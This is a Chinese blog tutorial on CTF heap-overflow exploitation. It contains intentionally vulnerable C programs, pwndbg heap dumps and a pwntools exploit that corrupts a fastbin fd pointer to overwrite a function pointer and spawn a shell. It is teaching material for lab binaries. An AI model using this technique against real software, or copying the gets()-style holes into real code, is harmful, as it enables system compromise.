Pwn-Overflow Free Chunk(堆溢出)

最新推荐文章于 2023-11-17 11:31:15 发布
最新推荐文章于 2023-11-17 11:31:15 发布
阅读量1.2k 收藏 6
点赞数 1
分类专栏: 题目篇 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CharlesGodX/article/details/88753484
版权

0x00:前言

这次介绍一种和栈溢出类似名字的堆溢出攻击,首先借用应用CTF-Wiki上的例子理解一下堆溢出。

0x01:漏洞介绍

堆溢出是指程序向某个堆块中写入的字节数超过了堆块本身可使用的字节数(之所以是可使用而不是用户申请的字节数,是因为堆管理器会对用户所申请的字节数进行调整,这也导致可利用的字节数都不小于用户申请的字节数),因而导致了数据溢出,并覆盖到物理相邻的高地址的下一个堆块,我们用两个例子来说明这个问题。

0x02:例子

Example One

创建overflow.c

#include <stdio.h>

int main(void) 
{
  char *chunk;
  chunk=malloc(24);
  puts("Get input:");
  gets(chunk);
  return 0;
}

编译

gcc -no-pie overflow.c -o overflow -g -w

我们把断点下好观察chunk变化

root@Thunder_J-virtual-machine:~/桌面# gdb overflow 
...
pwndbg> b 8
Breakpoint 1 at 0x400599: file overflow.c, line 8.
pwndbg> b 9
Breakpoint 2 at 0x4005aa: file overflow.c, line 9.
pwndbg> r
Starting program: /home/Thunder_J/桌面/overflow 
Get input:

Breakpoint 1, main () at overflow.c:8
pwndbg> x/20gx 0x602250-16
0x602240:	0x0000000000000000	0x0000000000000000
0x602250:	0x0000000000000000	0x0000000000000021 # 申请的chunk
0x602260:	0x0000000000000000	0x0000000000000000
0x602270:	0x0000000000000000	0x0000000000000411 # next chunk
0x602280:	0x75706e6920746547	0x00000000000a3a74
0x602290:	0x0000000000000000	0x0000000000000000
0x6022a0:	0x0000000000000000	0x0000000000000000
0x6022b0:	0x0000000000000000	0x0000000000000000
0x6022c0:	0x0000000000000000	0x0000000000000000
0x6022d0:	0x0000000000000000	0x0000000000000000
pwndbg> c
Continuing.
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa # 输入64个'a'覆盖下一个chunk

Breakpoint 2, main () at overflow.c:9
9	  return 0;
pwndbg> x/20gx 0x602250-16
0x602240:	0x0000000000000000	0x0000000000000000
0x602250:	0x0000000000000000	0x0000000000000021
0x602260:	0x6161616161616161	0x6161616161616161
0x602270:	0x6161616161616161	0x6161616161616161 # next chunk已经被覆盖
0x602280:	0x6161616161616161	0x6161616161616161
0x602290:	0x6161616161616161	0x6161616161616161
0x6022a0:	0x0000000000000000	0x0000000000000000
0x6022b0:	0x0000000000000000	0x0000000000000000
0x6022c0:	0x0000000000000000	0x0000000000000000
0x6022d0:	0x0000000000000000	0x0000000000000000

上面就是简单的堆溢出演示,在利用的时候当然不是这么的随便下面就看第二个例子。

Example Two

创建Overflow_Free_Chunk.c

#include<stdio.h>
#include<stdlib.h>
#include<string.h>

void sh(char *cmd){
	system(cmd);
}

int main()
{
	setvbuf(stdout,0,_IONBF,0);
	int cmd,idx,sz;
	char* ptr[10];
	memset(ptr,0,sizeof(ptr));
	puts("1. malloc + gets\n2. free\n3. puts");
	while(1){
		printf("> ");
		scanf("%d %d",&cmd,&idx);
		idx %= 10;
		if(cmd==1)
		{
			scanf("%d%*c",&sz);
			ptr[idx] = malloc(sz);
			gets(ptr[idx]);
		}
		else if (cmd==2)
		{
			free(ptr[idx]);
			ptr[idx] = 0;
		}
		else if (cmd==3)
		{
			puts(ptr[idx]);
		}
		else{
			exit(0);
		}
	}
}

编译

gcc -no-pie Overflow_Free_Chunk.c -o Overflow_Free_Chunk -g -w

我们在scanf输入处下断点观察

pwndbg> b 20
Breakpoint 1 at 0x40085b: file Overflow_Free_Chunk.c, line 20.
pwndbg> r
Starting program: /home/Thunder_J/桌面/Overflow_Free_Chunk 
1. malloc + gets
2. free
3. puts
> 
Breakpoint 1, main () at Overflow_Free_Chunk.c:20
20			scanf("%d %d",&cmd,&idx);

我们申请两次大小为24的chunk,为什么要申请24呢,因为最小的chunk大小为32位,,最小的堆即为prev_size(可以被上一个chunk占用),size,fd(可以被本chunk占用),bk(可以被本chunk占用) ,8*4即为32位,我们看一下堆的结构:

struct malloc_chunk {

  INTERNAL_SIZE_T      prev_size;  /* Size of previous chunk (if free).  */
  INTERNAL_SIZE_T      size;       /* Size in bytes, including overhead. */

  struct malloc_chunk* fd;         /* double links -- used only if free. */
  struct malloc_chunk* bk;

  /* Only used for large blocks: pointer to next larger size.  */
  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
  struct malloc_chunk* bk_nextsize;
};

我们知道,我们申请出来的chunk最少是32位,然而chunk的大小至少是16的倍数,我们申请小于24位的chunk,其实申请出来大小是32位,也就是:

prev_size + size + fd + bk

我们申请两次chunk之后的情况:

pwndbg> c
Continuing.
1 0
24 aaaaaaaa
>
pwndbg> c
Continuing.
1 1
24 bbbbbbbb
>
pwndbg> x/20gx 0x602660-16
0x602650:	0x0000000000000000	0x0000000000000000
0x602660:	0x0000000000000000	0x0000000000000021 # prev_size + size
0x602670:	0x6161616161616161	0x0000000000000000 # fd + bk
0x602680:	0x0000000000000000	0x0000000000000021
0x602690:	0x6262626262626262	0x0000000000000000 # 同上
0x6026a0:	0x0000000000000000	0x0000000000020961
0x6026b0:	0x0000000000000000	0x0000000000000000
0x6026c0:	0x0000000000000000	0x0000000000000000
0x6026d0:	0x0000000000000000	0x0000000000000000
0x6026e0:	0x0000000000000000	0x0000000000000000

我们释放两次chunk之后的情况:

pwndbg> c
Continuing.
2 1
>
pwndbg> c
Continuing.
2 0
>
pwndbg> x/20gx 0x602660-16
0x602650:	0x0000000000000000	0x0000000000000000
0x602660:	0x0000000000000000	0x0000000000000021
0x602670:	0x0000000000602690	0x0000000000000000
0x602680:	0x0000000000000000	0x0000000000000021
0x602690:	0x0000000000000000	0x0000000000000000
0x6026a0:	0x0000000000000000	0x0000000000020961
0x6026b0:	0x0000000000000000	0x0000000000000000
0x6026c0:	0x0000000000000000	0x0000000000000000
0x6026d0:	0x0000000000000000	0x0000000000000000
0x6026e0:	0x0000000000000000	0x0000000000000000

因为fastbin是单链表,所以我们free两次会得到一个单链表:

Fastbin[1]->0x602670->0x602690

当我们再次申请相同大小的chunk的时候,作合适的写入操作就可以覆盖下一个chunk的内容:

pwndbg> c
Continuing.
1 2
24 cccccccccccccccccccccccccccccccc
> 
pwndbg> x/20gx 0x602660-16
0x602650:	0x0000000000000000	0x0000000000000000
0x602660:	0x0000000000000000	0x0000000000000021
0x602670:	0x6363636363636363	0x6363636363636363
0x602680:	0x6363636363636363	0x6363636363636363
0x602690:	0x0000000000000000	0x0000000000000000
0x6026a0:	0x0000000000000000	0x0000000000020961
0x6026b0:	0x0000000000000000	0x0000000000000000
0x6026c0:	0x0000000000000000	0x0000000000000000
0x6026d0:	0x0000000000000000	0x0000000000000000
0x6026e0:	0x0000000000000000	0x0000000000000000

我们需要注意的第一点是,我们free的顺序不能乱,一旦乱了,就会导致无法覆盖到理想的chunk处,要深入理解fastbin的LIFO机制,也就是想象成栈的机制,最好的理解方式就是自己多试几次,我们需要注意的第二点是我们不能一直乱覆盖到下一个chunk的size大小,因为size代表这个chunk的大小,要是乱覆盖用‘cccccccc’替代size内容那这个chunk的大小就变成了0x6363636363636363,就不是fastbin的大小了,也就无法达到目的了,所以我们必须选择好偏移的位置,将size大小正确写入下一个chunk,然后将chunk的fd指向我们的free函数地址,然后将’sh’写入free函数的地方。

exp:

from pwn import *

p = process('./Overflow_Free_Chunk')

def malloc(i,s):
	p.recvuntil('> ')
	p.send('1 %d\n24 %s'%(i,s)+'\n')
	
def free(x):
	p.recvuntil('> ')
	p.send('2 %d'%x+'\n')

malloc(0,'aaaaaaaa')
malloc(1,'bbbbbbbb')
free(1)
free(0)
malloc(2,'a'*24 + p64(0x21) + p64(0x601018)) # free_hook
malloc(3,'sh') # write 'sh' in ptr[3]
malloc(4, p64(0x4007d7)) # write in sh() address
p.recvuntil('> ')
p.sendline('2 3') # free(3) ==> system('sh')
p.interactive()
Thunder_J
关注
专栏目录
一道方向的pwn溢出拼接)
F_Day_的博客
10-18 2003
一道方向的pwn溢出拼接) 这道题是17年0ctf的一道题,从里面还是能学到许多东西的 babyheap 这里我就直接记录我的做题过程 在此之前,查看保护信息,发现保护全开,emmmm Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 代码分析 先来看看伪代码 main函数就不做
pwn学习】溢出(二)- First Fit
Morphy_Amo的博客
01-09 976
glibc管理中的First Fit机制
Pwn 溢出(first_fit篇)
qq_51700257的博客
03-27 426
Pwn how2heap(first_fit篇) 我们先看看first_fit滴代码嗷 我们尝试运行该程序qwq,会出现神奇的情况 哎嘿,我们会发现第三个和第一个的地址一毛一样,这是为什么呢? 这段代码实际上展示的是分配的策略 在分配内存时,malloc会先到fastbin(或者unsorted bin)中查找合适大小的已经被freechunk,如果没有,就会把unsorted bin中的所有chunk分配到所属于的bins中,然后再去这些bins中寻找合适的chunk。当你使用malloc分配
pwn-溢出off-by-one
CharlesGodX的博客
04-17 1866
Thunder_J@Thunder_J-virtual-machine:~/桌面$ python exp.py [+] Starting local process './Storm_note': pid 16030 [*] '/home/Thunder_J/\xe6\xa1\x8c\xe9\x9d\xa2/Storm_note' Arch: amd64-64-little ...
pwn学习】溢出(一)
Morphy_Amo的博客
01-05 5109
pwn溢出的学习
日志 7.13 pwn 溢出基础知识
RobinZZX的博客
07-13 1583
溢出 先上图: 条件: 可以写入 大小无限制 的数据结构 一般情况下,物理相邻的两个空闲 chunk 会被合并为一个 chunk struct malloc_chunk { INTERNAL_SIZE_T prev_size; /*上一个chunk空闲时记录上一个chunk的大小,上一个chunk被使用时作为上个chunk的数据部分 */ INTERNAL_SIZE_...
BUUCTF PWN-题总结 2021-09-27
m0_56897090的博客
09-27 2151
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
溢出 Off-By-One 原理学习
prettyX的博客
04-11 2311
Off-By-One 严格来说,off-by-one是一种特殊的溢出漏洞,off-by-one指程序向缓冲区中写入时,写入的字节数超过了这个缓冲区本身所申请的字节数并且只越界了一个字节。 off-by-one,是指单字节缓冲区溢出,这种漏洞的产生往往与边界验证不严和字符串操作有关,也不排除写入的size正好就只多了一个字节的情况。 一般认为,单字节溢出是难以利用的,但是因为Linux的管理机制ptmalloc验证的松散性,基于Linux的off-by-one漏洞利用起来并不复杂,并且威力强大...
快速入门溢出技巧(OFF BY ONE)
wulanlin的博客
01-11 654
OFF BY ONE 所谓OFF BY ONE就是利用溢出一个字节到下一个块,使得目前块与下一块合并成一个块,此时块的大小就是我们溢出的那一字节 并且块的fd(前驱指针)以及bk(后继指针)都会指向 main_arena+88的地址这也是我们泄露出来的地址 利用gdb 输入libc查看基地址,main_arena+88-libc=offset UNSORTERBIN&FASTBINS 在块的bins中分为fastbins,largebins,smallbins还有今天要用
pwn利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5390
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn题中的利用。一般来说,想到使用IO_FILE结构,是因为pwn题中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
pwn利用的一些姿势 -- free_hook
lifanxin的博客
04-16 5190
free_hook概述初级必备姿势常规搭配姿势按需进阶姿势总结 pwn利用的一些姿势 – malloc_hook 概述   在做题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell
CTF-PWN--【溢出相关概括基本流程及first-fit演示与】
最新发布
llovewuzhengzi的博客
11-17 430
中写入的字节数超过本身可使用的字节数(可使用的字节数不一定等于申请的字节数,是因为管理器会对用户所申请的字节数进行调整,这也导致可利用的字节数都不小于用户申请的字节数),所以可能覆盖到相邻高地址的下一个块。chunkdata段地址对应的chunk与topchunk不相邻,相当于free(chunkdata段地址),malloc(size)相差容得下一个最小chunk,则切割chunk两部分,freechunkdata段地址对应的chunk的size-size的部分。一个三目运算符 a?
PWN基础之函数调用栈和栈溢出
weixin_46132162的博客
12-28 1523
在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态函数调用栈在内存中从高地址向低地址生长,所以栈顶对应的内存地址在压栈时变小,退栈时变大。接下来vulnerable_function()函数会调用read()函数,这个时候vulnerable_function()函数为主调函数(caller function)read()函数为被调函数(callee function)read()函数 是有参数的,我们来看一看有参数的函数在函数调用栈是什么样的。
pwn学习总结(五) —— 溢出经典题型整理
qq_41988448的博客
12-29 2281
pwn学习总结(九) —— 经典题目整理三(持续更新)fastbin + 栈溢出fastbin + 函数构造 fastbin + 栈溢出 题目:fastbin 环境:ubuntu 16.04 下载地址:https://pan.baidu.com/s/1R6-BVR91Io_ZVPDDpBcCkA 提取码:r7e5 查看程序防护: 使用ida进行反编译: 已知条件: 可以得到mai...
linux 溢出 pwn 指南,新手科普 | CTF PWN溢出总结
weixin_36467693的博客
05-16 1012
学习汇总序言自从加入RTIS交流群, 在7o8v师傅,gd大佬的帮助下,PWN学习之路进入加速度。下面是八周学习的总结,基本上是按照how2heap路线走的。由于八周内容全写,篇幅太长,这里只讲述每道PWN题所用到的一个知识点。第一节(fastbin_dup_into_stack)知识点利用fastbin之间,单链表的连接的特性, 溢出修改下一个free chunk的地址, 造成任意地址写.例子:...
漏洞挖掘中chunk的malloc、free
董哥的黑板报
07-29 1507
malloc的机制 如果程序是第一次mallloc:会创建一个很大的“top chunk” 如果程序是第二次及之后malloc:会去先向bins链表寻找空间,如果没有再去向“top chunk”要空间;如果“top chunk”使用完了再通过glibc重新申请一块新的“top chunk” 一、程序第一次malloc 如果程序是第一次malloc,glibc会向内核申请一块很大的内存空间供...
【CTF资料-0x0002】PWN简易Linux利用入门教程by arttnba3
arttnba3的博客
02-25 5894
【CTF资料-0x0002】简易Linux利用入门教程by arttnba3老生常谈,[GITHUB BLOG ADDR](https://archive.next.arttnba3.cn/2021/02/24/%E3%80%90CTF%E8%B5%84%E6%96%99-0x0002%E3%80%91%E7%AE%80%E6%98%93Linux%E5%A0%86%E5%88%A9%E7%94%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8Bby%20arttnba3/),请
pwn int_overflow
weixin_45677731的博客
03-15 204
32位程序,拖进ida看一下 首先,我们要输入1进入login() 输入username后再输入passwd,注意这里passwd允许我们输入的长度为0x199 再点进check_passwd 这里用v3来保存我们输入的passwd的长度,但是,这个v3是unsigned int8型的,8个字节,只能存储不超过256的数,如果超过会重新从1开始计算,这样的话,对于1个字符和257个字符,v3...
攻防世界pwn int_overflow writeup
PLpa的博客
07-07 1875
这是一道整数溢出题 我们知道,整数溢出本身不一定会对程序造成很大的伤害,但是他会造成其他形式的溢出,从而也十分的危险。 拿到题目,我们首先查看一下源代码的保护情况: 从上图可以看出,这是一个32位的程序,并且只开了栈不可执行的保护。 我们使用IDA查看一下源码: 我们进入这个check_passwd函数: 当v3>3u且v3<8u时,我们可以进入下面的else中。 else中把...
攻防世界 pwn 进阶 bufoverflow_b
yongbaoii的博客
03-13 260
跟bufoverflow_b差不多,就是多了个检查。 所以先看看bufoverflow_a 说跟bufoverflow_a差不多是为啥,因为它就是在输入的时候检查多了一项。 这个是bufoverflow_a 这个是bufoverflow_b 这个题会检查我们的输入是不是\x00,意思是会被\x00截断,那么我们在输入数据的时候就会麻烦一些。 那我们怎么去解决这个烦恼,我们这里利用大佬的方法。 在我们向内存中写地址的时候内存中一定会有一些垃圾数据,我们写数据的时候,假如我们要写入一个地址,在内存中小端序
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值